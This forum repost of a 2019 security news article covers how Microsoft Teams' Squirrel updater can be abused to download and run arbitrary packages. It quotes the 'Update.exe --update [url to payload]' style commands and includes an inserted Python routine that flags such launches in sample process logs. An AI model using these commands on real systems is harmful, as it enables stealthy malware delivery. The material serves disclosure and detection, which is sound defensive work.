Windows News and info 15th Anniversary 2009-2024

Windows 11 | Windows 10 Modifying => Patch Tuesday| Updates | Security | Privacy | Anti-virus => Topic started by: javajolt on June 29, 2019, 04:26:34 PM

Title: Microsoft Teams Can Be Used to Download and Run Malicious Packages
Post by: javajolt on June 29, 2019, 04:26:34 PM
The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system.

The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers but it can be used only to download a payload.

These applications rely on the open source Squirrel (http://github.com/Squirrel/Squirrel.Windows) project to manage installation and updating routines, which uses NuGet (http://docs.microsoft.com/en-us/nuget/what-is-nuget) package manager to create the necessary files.

Multiple security researchers discovered that by using the 'update' command of a vulnerable application, it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.'

With Microsoft Teams, a payload is added to its folder and executed automatically using either of the following commands:

Quote
Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

The commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.

Quote
Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts (LOLBAS (http://lolbas-project.github.io/)) database on GitHub, directly accessible here (http://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/) and here (http://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/).
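As an added example (not from the article, the researchers, or the Squirrel project), here is a small detection routine for the blue team: it scans constructed process-creation events and flags Update.exe or squirrel.exe launched with --update or --download pointing at a remote URL. The allowlisted updater host is an assumed placeholder, not a real Microsoft endpoint.

```python
from urllib.parse import urlparse

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real
# telemetry. Fields are pipe-separated key=value pairs for brevity.
SAMPLE_EVENTS = [
    r"Image=C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=Update.exe --update http://192.0.2.10/pkg/",
    r"Image=C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe|ParentImage=C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe|CommandLine=Update.exe --processStart Teams.exe",
    r"Image=C:\Users\bob\AppData\Local\SquirrelTemp\squirrel.exe|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=squirrel.exe --download https://example.invalid/payload.nupkg",
    r"Image=C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=Update.exe --update=https://updates.example-corp.invalid/Teams",
    r"Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe --update",
]

SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}
SUSPICIOUS_SWITCHES = {"--update", "--download"}
# Assumed allowlist of hosts the legitimate updater may contact (placeholder value;
# replace with the hosts observed for sanctioned updates in your environment).
ALLOWED_HOSTS = {"updates.example-corp.invalid"}


def parse_event(line):
    """Split one 'key=value|key=value' event line into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def extract_url(command_line):
    """Return the URL passed to --update/--download ('--update URL' or '--update=URL'), else None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens):
        switch, _, inline = tok.partition("=")
        if switch.lower() in SUSPICIOUS_SWITCHES:
            candidate = inline or (tokens[i + 1] if i + 1 < len(tokens) else "")
            if candidate.lower().startswith(("http://", "https://")):
                return candidate
    return None


def is_suspicious(event):
    """True when a Squirrel binary fetches from a host outside the allowlist."""
    image = event.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image not in SQUIRREL_BINARIES:
        return False
    url = extract_url(event.get("CommandLine", ""))
    if url is None:
        return False
    host = (urlparse(url).hostname or "").lower()
    return host not in ALLOWED_HOSTS


def find_suspicious(lines):
    return [event for event in map(parse_event, lines) if is_suspicious(event)]
```

Pairing the hit with ParentImage (a shell or script host spawning the updater) is a useful second signal when tuning this in a real environment.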

Reverse engineer Reegun Richard (http://twitter.com/reegun21) tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software.

Trying to replicate the effect with GitHub, WhatsApp, and UiPath did not result in execution of the payload; only downloading it from a remote server was possible.

"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.

Rooting for the blue team, Richard wanted to keep the details private until Microsoft released a patch, but they were made public before that.

Another researcher playing for the red team, Mr.Un1k0d3r (http://twitter.com/MrUn1k0d3r) of the RingZer0 (http://ringzer0ctf.com/) Team, had found the issue and published the details.


In a thread (http://twitter.com/reegun21/status/1144109729737691136) on Twitter, Richard explains the process of finding the bug and its root cause. He started from previous (http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/) research published in late March by Hexacorn (http://twitter.com/Hexacorn), which focused on living-off-the-land binaries (lolbins) in Electron-based apps.

Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a blog post (http://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12) from the researcher.

Microsoft Teams is intended for business use as a step up from Skype for Business. It is an alternative to Slack and offers unified communications with video meetings, file storage, and collaboration features. It supports extensions for integration with products from other developers.

source (http://www.bleepingcomputer.com/news/security/microsoft-teams-can-be-used-to-download-and-run-malicious-packages/)